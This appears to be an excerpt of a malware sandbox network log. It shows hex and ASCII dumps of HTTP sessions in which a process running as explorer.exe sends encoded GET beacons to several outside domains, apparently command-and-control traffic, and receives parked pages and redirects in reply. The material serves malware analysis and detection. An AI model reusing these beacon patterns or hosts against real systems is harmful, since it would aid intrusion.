4d 4b 35 53 5a 75 74 68 64 67 47 59 4e 34 41 63 57 65 4a 4c 77 38 6f 41 44 4c 45 63 61 2b 51 70 79 2f 78 58 5a 42 31 4f 61 42 78 43 6e 57 55 57 41 43 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 71 75 61 69 6c 72 75 6e 2d 69 6e 63 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 71 75 61 69 6c 72 75 6e 20 69 6e 63 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 71 75 61 69 6c 72 75 6e 2d 69 6e 63 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0u9RF1xSBp0klsQTvRRBj9syLHtooV/LoaHMK5SZuthdgGYN4AcWeJLw8oADLEca+Qpy/xXZB1OaBxCnWUWACQ==><head><meta charset="utf-8"><title>quailrun-inc.com - quailrun inc Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="quailrun-inc.com is your first and best source for all of the information youre looking for. Fr
Oct 26, 2023 09:47:16.850387096 CEST	49	IN	Data Raw: 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 71 75 61 69 6c 72 75 6e 2d 69 6e 63 2e 63 6f 6d 20 Data Ascii: om general topics to more of what you would expect to find here, quailrun-inc.com has it all. We hope you AECfind what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/
Oct 26, 2023 09:47:16.850404978 CEST	50	IN	Data Raw: 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 Data Ascii: w:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appeara
Oct 26, 2023 09:47:16.850442886 CEST	51	IN	Data Raw: 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 Data Ascii: t{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:cen
Oct 26, 2023 09:47:16.850461960 CEST	53	IN	Data Raw: 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d Data Ascii: print__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-li
Oct 26, 2023 09:47:16.850481987 CEST	54	IN	Data Raw: 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 Data Ascii: .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-
Oct 26, 2023 09:47:16.850522041 CEST	55	IN	Data Raw: 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:init
Oct 26, 2023 09:47:16.850568056 CEST	56	IN	Data Raw: 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 Data Ascii: ght:100%;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top
Oct 26, 2023 09:47:16.850629091 CEST	58	IN	Data Raw: 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f Data Ascii: p}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-l
Oct 26, 2023 09:47:16.850755930 CEST	59	IN	Data Raw: 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e Data Ascii: __list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}
Oct 26, 2023 09:47:17.034360886 CEST	61	IN	Data Raw: 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 30 75 39 52 46 31 78 53 42 70 30 6b 6c 73 51 54 76 52 52 42 6a 39 73 79 4c 48 74 6f 6f 56 2f 4c 6f 61 48 4d 4b 35 53 5a 75 74 68 64 67 47 59 4e 34 41 63 57 65 4a 4c 77 38 6f 41 44 4c 45 63 61 2b Data Ascii: HU4LENMCAwEAAQ==_0u9RF1xSBp0klsQTvRRBj9syLHtooV/LoaHMK5SZuthdgGYN4AcWeJLw8oADLEca+Qpy/xXZB1OaBxCnWUWACQ==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":faAE6lse,"slsh":false,"pp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49747	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:47:37.390469074 CEST	119	OUT	GET /4hc5/?P6=aEvA5DdolFnSpG3wqqUvIRZQPhFuP/nqnfvGSsdAIfGqv2pNtxEQnoAbm37B6N+rsMpI&ntxh9=V48LzvX0 HTTP/1.1 Host: www.bollywood.nexus Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:47:37.570867062 CEST	120	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 26 Oct 2023 07:47:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6c 6c 79 77 6f 6f 64 2e 6e 65 78 75 73 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='0; url=http://www.bollywood.nexus/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49748	103.120.80.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:47:58.535069942 CEST	120	OUT	GET /4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2 HTTP/1.1 Host: www.lpqxmz.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:47:58.844593048 CEST	121	IN	HTTP/1.1 200 OK Server: wts/1.7.0 Date: Thu, 26 Oct 2023 07:48:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: "64daefaa-1a1c" Data Raw: 31 61 32 35 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 70 71 78 6d 7a 2e 73 69 74 65 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 66 69 31 32 33 2e 6f 6e 6c 69 6e 65 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e Data Ascii: 1a25<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>lpqxmz.site-(www.west.cn)</title> <meta name="description" content="wifi123.online," /> <meta name="keywords" conten
Oct 26, 2023 09:47:58.844628096 CEST	122	IN	Data Raw: 74 3d 22 77 69 66 69 31 32 33 2e 6f 6e 6c 69 6e 65 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 Data Ascii: t="wifi123.online," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body,
Oct 26, 2023 09:47:58.844665051 CEST	122	IN	Data Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d Data Ascii: color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } html, body { height: 100%; } html, body,
Oct 26, 2023 09:47:58.844698906 CEST	123	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 74 64 2c 0d 0a 20 20 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d Data Ascii: td, fieldset { margin: 0; padding: 0; } .wrap { margin: 0px auto; min-width: 990px; max-width: 1190px }
Oct 26, 2023 09:47:58.844732046 CEST	123	IN	Data Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 30 70 78 20 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 Data Ascii: padding: 0 0 20px 0 } .orangebtn { background-color: #ff8400; display: inline-block; padding: 0px 20px; color: #fff; height: 50px; l
Oct 26, 2023 09:47:58.844765902 CEST	124	IN	Data Raw: 20 34 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 65 66 66 30 37 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d Data Ascii: 48px; color: #feff07; font-family: Tahoma, sans-serif; padding: 60px 0 20px 0 } .banner1 p { color: #fff; font-size: 20px; }
Oct 26, 2023 09:47:58.844803095 CEST	125	IN	Data Raw: 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 33 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a Data Ascii: 100%; margin-right: 320px; font-size: 16px } .domainout { padding: 50px 380px 50px 100px } .domainout p { line-height: 50px;
Oct 26, 2023 09:47:58.844855070 CEST	125	IN	Data Raw: 20 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 37 38 30 64 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a Data Ascii: .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color: #fff; padding: 0px 20p
Oct 26, 2023 09:47:58.844888926 CEST	126	IN	Data Raw: 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 69 6d 67 70 69 63 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 35 70 78 20 30 20 32 30 70 78 20 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a Data Ascii: .imgpic { padding: 25px 0 20px 0 } .contact { margin-left: 50px } .contact p { line-height: 40px } a {
Oct 26, 2023 09:47:58.844921112 CEST	126	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 Data Ascii: color: #666; } .footer-link a:hover { color: #ff8400; } .footer-link span { padding: 0 6px; } </style></head><body> <div cla
Oct 26, 2023 09:47:59.154012918 CEST	127	IN	Data Raw: 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 2e 63 6e 2f 79 6b 6a 2f 76 69 65 77 2e 61 73 70 3f 64 6f 6d 61 69 6e 3d 6c 70 71 78 6d 7a 2e 73 69 74 65 22 20 63 6c 61 73 73 3d Data Ascii: ><span></span><a href="https://www.west.cn/ykj/view.asp?domain=lpqxmz.site" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49749	13.32.208.72	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:48:38.253900051 CEST	130	OUT	GET /4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx HTTP/1.1 Host: www.therealnikib.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:48:38.347337008 CEST	130	IN	HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Thu, 26 Oct 2023 07:48:38 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://www.therealnikib.com/4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx X-Cache: Redirect from cloudfront Via: 1.1 c396de17c1b5d58233088e40dd170cf4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: IAD66-C1 X-Amz-Cf-Id: lmhw_IO_HsjgvFsktqYEZufXEYOtCoa5QYMvN5v1qbdbXqs8KtLbcw== Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49750	45.64.97.60	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:48:59.501363039 CEST	131	OUT	GET /4hc5/?P6=Td1U1SjQUadfC3cbiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIbAvBbRddo&ntxh9=V48LzvX0 HTTP/1.1 Host: www.slotjitu88.website Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:48:59.829467058 CEST	133	IN	HTTP/1.1 200 OK Date: Thu, 26 Oct 2023 07:48:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Thursday, 26-Oct-2023 07:48:59 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 Data Ascii: 553<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!
Oct 26, 2023 09:48:59.829545021 CEST	133	IN	Data Raw: 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d Data Ascii: ![]+!![]+[])+(+!+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(
Oct 26, 2023 09:48:59.829579115 CEST	133	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49751	154.205.127.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:49:19.774091005 CEST	134	OUT	GET /4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv HTTP/1.1 Host: www.iqixuehe.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
